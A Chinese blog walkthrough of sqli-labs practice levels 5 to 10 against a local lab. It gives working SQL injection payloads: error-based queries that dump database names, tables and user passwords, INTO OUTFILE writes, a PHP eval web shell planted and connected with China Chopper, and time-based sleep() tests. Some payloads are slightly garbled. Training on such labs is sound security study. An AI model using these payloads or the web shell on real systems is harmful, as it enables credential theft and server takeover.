sqli-lbs:Less-5~10通关详解

最新推荐文章于 2024-01-27 12:09:06 发布
最新推荐文章于 2024-01-27 12:09:06 发布
阅读量471 收藏 1
点赞数
分类专栏: sqli-labs 文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45756971/article/details/109227659
版权

第五关:Double Query- Single Quotes- String

1.输入?id=2看见页面如下:
在这里插入图片描述输入?id=666时,发现页面发生变化
在这里插入图片描述说明页面没有显示位。无法使用联合查询注入
2.接着我们尝试在URL中输入 ?id=2’ 页面出现错误语句如下
在这里插入图片描述但是可以发现存在注入点,这里可以闭合引号,随后通过查询列数发现这里也是3列
这道题使用的是报错注入
2.何为报错注入
报错注入就是通过人为的引起数据库的报错,但是数据库在报错的同时会将查询的结果也呈现在报错中,我在这里介绍一下报错注入以及原理
这是网上使用最广泛的一句报错注入语句:
select count(*),(floor(rand(0)2))x from information_schema.tables group by x;
那么必须是要按这个句子来执行吗,或者必须要这些句子吗?
通过查找很多网站的资料,我总结出:
group by,rand(),floor()三个函数是必须存在的,缺一不可,并且rand(),rand(0)两个句子还是有一些区别的,其中rand()在两条数据以上随即报错,rand(0)在三条数据以上必报错
介绍三种报错注入常用的语句:

(1). 通过floor报错
and (select 1 from (select count(*),concat(( payload),floor (rand(0)*2))x from information_schema.tables group by x)a)
其中payload为你要插入的SQL语句
需要注意的是该语句将 输出字符长度限制为64个字

(2). 通过updatexml报错
and updatexml(1, payload,1)
同样该语句对输出的字符长度也做了限制,其最长输出32位
并且该语句对payload的反悔类型也做了限制,只有在payload返回的不是xml格式才会生

(3). 通过ExtractValue报错
and extractvalue(1, payload)
输出字符有长度限制,最长32位。

payload即我们要输入的sql查询语句

**3.**构造如下语句:http://127.0.0.1/Less-5/?id=2’ and (select 1 from (select count(*),concat((select group_concat(schema_name) from information_schema.schemata),floor (rand()2)) as x from information_schema.tables group by x) as a) --+
在这里插入图片描述
提示输出信息超过一行,说明这里数据库名组成的字符串长度超过了64位(group_concat()函数最大长度为64位),所以需要放弃group_concat()函数,而使用limit 0,1来一个个输出。
limit 0,1 表示输出第一个数据。 0表示输出的起始位置,1表示跨度为1(即输出几个数据,1表示输出一个,2就表示输出两个)
更改语句为:http://127.0.0.1/Less-5/?id=2’ and (select 1 from (select count(),concat((select concat(schema_name,’;’) from information_schema.schemata limit 0,1),floor(rand()2)) as x from information_schema.tables group by x) as a)–+
在这里插入图片描述**4.**继续爆其他数据库名,改变limit n,1即可:http://127.0.0.1/Less-5/?id=2’ and (select 1 from (select count(),concat((select concat(schema_name,’;’) from information_schema.schemata limit 1,1),floor(rand()*2)) as x from information_schema.tables group by x) as a) --+

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述
会发现到了n=6的时候就发生了变化:
在这里插入图片描述当显示该情况时,说明已经爆完。
5. 爆security数据库中的表:
构造:http://127.0.0.1/Less-5/?id=2’ and (select 1 from (select count(*),concat((select concat(table_name,’;’) from information_schema.tables where table_schema=‘security’ limit 0,1),floor(rand()*2)) as x from information_schema.tables group by x) as a) --+ 还是更换limit n,1一个一个爆出。
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
**6.**爆users表的列名:http://127.0.0.1/Less-5/?id=2’ and (select 1 from (select count(*),concat((select concat(column_name,’;’) from information_schema.columns where table_name=‘users’ limit 0,1),floor(rand()*2)) as x from information_schema.columns group by x) as a) --+
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

**9.**爆users表中的内容:用户名和密码为,同样,limit n,1 慢慢来吧:http://127.0.0.1/Less-5/?id=2’ and(select 1 from (select count(*),concat((select concat(username,’: ‘,password,’;’) from security.users limit 0,1),floor(rand()*2)) as x from security.users group by x) as a)–+

在这里插入图片描述
在这里插入图片描述
!在这里插入图片描述
在这里插入图片描述

除此之外还有好几个,我就不一一爆出了,一共14个用户名和密码,到了n=14就会发现爆完了。好啦,第五题就此完事🤭。

第六关:Double Query- Double Quotes- String

第六关和第五关一样也没有数据回显,所以我们这里仍然使用报错注入
实现判断注入点,输入单引号没有报错,说明此处不是单引号型注入,尝试使用双引号,报错,所以此处使用双引号闭合来注入
?id=1 --+
在这里插入图片描述其余过程不再赘述,请参考第五关.

第七关:Less-7 Dump into Outfile

第七关和上一关有所不同,这里说明了要使用outfile函数,outfile函数就是将数据库的查询内容导出到一个外部文件
1.我们正常输入?id=1页面回显如下
在这里插入图片描述2.当我们输入 and 1=2 页面显示依然正常,说明不是数值型注入
在这里插入图片描述3.当我们输入?id=1’页面报错,说明可能存在"注入
在这里插入图片描述4…当我们输入?id=1’ --+页面显示依然不正常
在这里插入图片描述 5.接着我们尝试?id=1’) --+,页面依然显示不正常,有点难受,不过没关系
在这里插入图片描述6.我们可以接着输入?id=5’)) --+尝试,发现页面回显正常
在这里插入图片描述 7. 由于本关卡提示我们使用file权限向服务器写入文件,我们就先尝试下写数据
由于我用的是phpstudy搭建的环境,所以我直接在我本机取一个目录就好
C:\phpStudy\PHPTutorial\MySQL\data
在这里插入图片描述 然后使用union select 1,2,3 into outfile “C:\phpStudy\PHPTutorial\MySQL\data\chao.php” 尝试写入文件。
然后去本机文件夹下查看文件是否写入成功。
在这里插入图片描述
写入成功了,但是文件名变成了如图红色表示的那样!!
接着我进行了好多次尝试,最后被同学告知,需要使用\来代替目录中的\ ,具体原因我也不知道,后续会补上。 命令如下:
union select 1,2,3 into outfile “C:\phpStudy\PHPTutorial\MySQL\data\chao.php”
文件导入成功!,接着我们查看chao.php的内容
在这里插入图片描述
需要注意的是利用数据库file权限向操作系统写入文件时, 对于相同文件名的文件不能覆盖,所以如果第一次上传chao.php,下次在上传chao.php,就是无效命令了,也就是新的chao,php中的内容并不会覆盖,之前的chao.php

我们再尝试上传一句话木马,具体命令
?id=-1’)) union select 1,"<?php @eval($_POST['chopper']);?>",3 into outfile “C:\phpStudy\PHPTutorial\WWW\123456.php” --+
接着试着访问一下这个文件
在这里插入图片描述上传成功,使用菜刀链接下

在这里插入图片描述连接成功!!!!🤭

第八关: Blind- Boolian- Single Quotes- String

1.?id=2’ --+ 页面回显正常,不赘述了,这里是单引号字符型注入

在这里插入图片描述 2.页面没有显示位,没有数据库报错信息。
我们先尝试一下是否有file权限
http://127.0.0.1/sqli-labs/Less-8/?id=2’ union select 1,2,3 into outfile “C:\phpStudy\PHPTutorial\WWW\88888.php”–+
上传成功

在这里插入图片描述

第九关:Blind- Time based- Single Quotes- String

这里我们尝试使用单引号和双引号闭合,发现页面回显一直正常,说明该关卡可能将我们的单双引号给退意了。
在这里插入图片描述
但是我输入%df之后页面回显依然正常,这个时候我觉得应该是无论我输入什么页面回显都是一样的。所以我尝试使用sleep()函数来测试,经过多次尝试,这里是单引号闭合的时间注入
’ and sleep(5)

第十关:Time based- Double Quotes- String

基于双引号的时间注入
?id=2" and sleep(5) --+
这里我就不在一个一个字母的去测试了,大家了解一下时间盲注就好

Blank⁰
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQLi-Sandbox:FDP
05-08
SQLi-Sandbox是在TryHackMe( )上托管SQL注入实验室(sqlilab)。 该实验室向用户介绍了SQL注入,并涵盖了各种SQL注入类别,例如二阶,盲目和基于UNION的注入。 该平台有两个轨道,其中一个轨道是挑战的结合。 SQL...
sqli-labs 通关笔记详解 Less1 - Less10
HAKUNAMATATATTA的博客
12-18 2240
sqli-labs靶场之前建议补一下基础。
sqli-lbs靶场搭建
最新发布
qq_43784516的博客
01-27 646
如果想通过域名访问就要勾选同步hosts(杀软可能会告警,无视即可)php版本建议使用5.4,可以直接在小皮里面下载。如果不想通过域名访问就要保证端口号唯一。域名随意设置,但是必填且唯一。
sqli-labs less1-5通关过程
a1245678899的博客
10-05 200
爆指定数据库的指定表的字段(列)名数据(因为users表是很多数据库都有所以应该加个and子句限定指定数据库)id=1' order by 4 --+的时候,会出现第四列不存在,所以可以判断出表格有3列。hackbar里面有这个功能,就是把0x十六进制数识别,后面的是把符号转换为16进制数。然后用判断其第几列有回显,这里注意id后面的数字要采用一个不存在的数字。id=-1") union select 1,2,3 --+id=1' and 1=1--+此时后面的步骤就和less1的步骤一样。
sqli-labs(1-5)详解,最详细小白必看
u258710的博客
06-19 2734
1Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入) 输入http://192.168.67.134/sqli/Less-1/?id=1’ 我们发现返回ou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘‘1’’
sqli-lab教程 less-5,6
xiaoyuhensuai的博客
07-08 277
在我们输入:?id=1时会显示“You are in...........”,从中我们可以发现这一关和上面的关卡不同,它并不会显示出users和password。所有在这一关中我们要使用“报错注入”,此时我们就需要使用“extractvalue”,因为xpath格式字符串不合法,就会报错,只要在参数的开头位置添加一些特殊字。对数据库进行查找:?id=1' union select 1,2,extractvalue(1,concat('%',database())) --+输入之后便会报错显示:XPATH s
SQLi-Lab:每个SQL注入实验室
03-29
每个SQL注入的实验室
SQLi-Dork-Repository:Dorks 黑客教育提案数据库
05-29
SQLi-Dork-Repository Dorks 黑客教育提案数据库
sqli-template-gulp:模板GULP SQLI
05-04
Slush Sqli-template-gulp 生成sqli项目模板入门全局安装slush-sqli-template-gulp : $ npm install -g slush-sqli-template-gulp用法为您的项目创建一个新文件夹: $ mkdir my-slush-sqli-template-gulp 从新...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
Sqli-labs less 5
weixin_34403693的博客
08-11 546
Less-5 这里说一下,有很多的blog是翻译或者copy的,这关正确的思路是盲注。从源代码中可以看到,运行返回结果正确的时候只返回you are in....,不会返回数据库当中的信息了,所以我们不能利用上述less1-4的方法 我们从这这一关开始学习盲注。结合background-2的信息,将上述能使用的payload展示一下使用方法。 利用left(database(),...
Sqli-labs Less-5 Double Query- Single Quotes- String
04-15 201
首先弄一个id出来查看有什么显示出来。 显示上面的内容出来。
sqli-labs 笔记 一
Lyn_10086的博客
09-28 2557
sqli-lbs笔记:test 1 一、搭建与数据库的初始化 1、搭建前准备: 搭建用phpstudy搭建 下载phpstudy:下载官网 下载完成后打开Apache+MySQL功能 点击网站,再单击左上角的创建网站,把根目录改到WWW下,点击确定,网站即可创建成功。 后注: php的版本要选择5.6 不然创建数据库的时候就会失败 2、搭建环境 Sqli-labs项目地址—Github获取 将下载的sqli文件解压到PHP study的WWW目录下 解压后进入sqli下的sql-connection
sql注入第九关------延时注入
qq_45751902的博客
03-14 4372
这关无论输入什么闭合符号回显都是正确的,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。当然也需要构造闭合。 先引入几个函数 1.if(Condition,A,B)函数 2.当Condition为TRUE时,返回A;当Condition为FALSE时,返回B。 3.sleep()函数 网页延迟n秒后,输出结果 4.left()函数 左边数,取几个数 5.substr(var1, var2, var3) 功能:从字符串里截取其中一段字符(串) - va
报错注入_sqli-labs less5 Double Query- Single Quotes- String
qq_51550750的博客
03-24 2805
sqli-labs less5 Double Query- Single Quotes- String ?id=1 无回显 考虑报错注入 (1)判断字符型还是数字型 http://39.101.162.123:10067/Less-5/?id=1%27%20and%201=%201–+ http://39.101.162.123:10067/Less-5/?id=1%27%20and%201=%202–+ 字符型而且是单引号闭合 (2)判断字段个数: http://39.101.162.123:100
sqli-lbs-2 GET - Error based - Intiger based (基于错误的GET整型注入)
qq_45756971的博客
10-18 180
知识点:1,判断是数字型还是字符型,单引号还是双引号 2,union select联合查询注入 3,payload原理与防御措施 这道题与上道题的主要区别就是这个是整型,即这个题的id参数没有引号,只是数字,这意味着在你绕过的时候可以不需要对后面的引号过滤(如果没有其他干扰的话) 大概步骤:1.输入?id=2-1页面信息发生变化,说明此处是数值型注入 2.order by 3 页面显示正常,order by 4页面显示不正常,所以该表有3列数据 3.接着可以使用联合查询进行注入,详细过程参考第一关 接下来
sqli-labs】 less5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)...
ajxi63204的博客
01-19 426
双注入查询可以查看这两篇介绍 https://www.2cto.com/article/201302/190763.html https://www.2cto.com/article/201303/192718.html 简而言之就是构造如下的查询,会使得查询结果的一部分通过报错的形式显示出来 select count(*),concat((select version())...
SQLi-Labs】Less-6 Double Query- Double Quotes- String
xw1995115的博客
11-15 896
本节实现原理和方法和Less-5基本一样,不同的是单引号变双引号,详见【SQLi-Labs】Less-5 GET - Double Injection - Single Quotes - Stringhttps://blog.csdn.net/xw1995115/article/details/121329780?spm=1001.2014.3001.5501 本节复现下注入过程。 1.利用单引号尝试封闭查询语句,发现未报错 2. 利用双引号尝试封闭查询发现报错,因此为双引号封闭的查询语句 ...
sqli-lab 闯关教程 Less-5
羽路星尘的博客
11-13 293
目录函数说明注入原理及过程演示试验结果 函数说明 实验所用核心函数: rand():是一个生成随机数的函数,他会返回0到1之间到一个值。 floor():是取整函数。 count():是一个聚合函数,用户返回符合条件的记录数量。 查询相关函数: concat_ws():使用语法为:CONCAT_WS(separator,str1,str2,…) CONCAT_WS() 代表 CONCAT With Separator ,是CONCAT()的特殊形式。第一个参数是其它参数的分隔符。分隔符的位置放在要连接的
sqli-labs-less
07-25
抱歉,但我无法回答关于sqli-labs-less的问题。 #### 引用[.reference_title] - *1* *2* *3* [sqli-labs-less-1完整解析,小白干货](https://blog.csdn.net/qq_46432288/article/details/109226871)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值